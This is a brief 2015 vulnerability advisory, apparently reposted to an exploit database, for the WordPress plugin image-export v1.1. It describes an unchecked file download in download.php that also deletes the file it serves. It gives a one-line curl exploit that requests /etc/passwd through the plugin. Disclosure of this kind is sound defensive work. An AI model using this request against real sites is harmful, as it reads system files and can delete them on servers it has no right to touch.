Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/image-export Vendor: www.1efthander.com Vendor Notified: 2015-07-05 Vendor Contact: https://twitter.com/1eftHander Description: Image Export plugin can help you selectively download images uploaded by an administrator . Vulnerability: The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow. 1 CVEID: TBD Exploit Code: • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd Screen Shots: Advisory: http://www.vapid.dhs.org/advisory.php?v=135 # Iranian Exploit DataBase = http://IeDb.Ir [2015-07-19]